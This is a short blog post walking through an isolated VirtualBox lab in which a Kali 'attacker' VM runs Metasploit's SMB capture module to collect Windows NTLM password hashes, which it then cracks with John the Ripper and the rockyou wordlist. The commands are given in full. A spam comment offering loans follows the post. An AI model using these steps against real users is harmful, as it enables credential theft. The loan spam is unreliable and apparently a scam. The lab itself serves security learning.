Friday, December 27, 2019

metasploit smb capture password hashes

create 2 vms in virtualbox

1.) kali linux ATTACKER
      will be used to run ettercap and perform man-in-the-middle
2.) windows VICTIM
       will be the victim trying to access the web server

1.) setup both virtualbox Network tab to use "Internal Network" and the same name
2.) power up both
3.) windows will already have an ip address such as
4.) configure kali linux ATTACKER to similar ip address as windows
       ifconfig eth0 netmask up
5.) ping each other from within each virtual machine to ensure connectivity
6.) on kali linux ATTACKER system start the metasploit smb capture module

> msfconsole
msf> use auxillary/server/capture/smb
msf> set CAINPWFILE /tmp/cain.pw1
msf> set JOHNPWFILE /tmp/john.txt

7.) on windows VICTIM system open windows explorer and try to connect to the attacker box
      windows will popup an authentication prompt, enter a user & password  (e.g. guy, password)

8.) on kali linux ATTACKER system metasploit should inform you it captured a hash and saved it to \tmp\john.txt 
     type exit to exit metasploit
     run john against the newly captured file
       > john /tmp/john.txt_netntlmv2 --wordlist /usr/share/wordlists/rockyou.txt

     if it's a weak password (like 'password') john should crack it quickly and display it to you on the screen

1 comment:

  1. Are you in need of finance? we give out guarantee cash at 3% interest rate. Contact us on any kind of finance now: whatsapp Number +918929509036 Dr James Eric Finance Pvt Ltd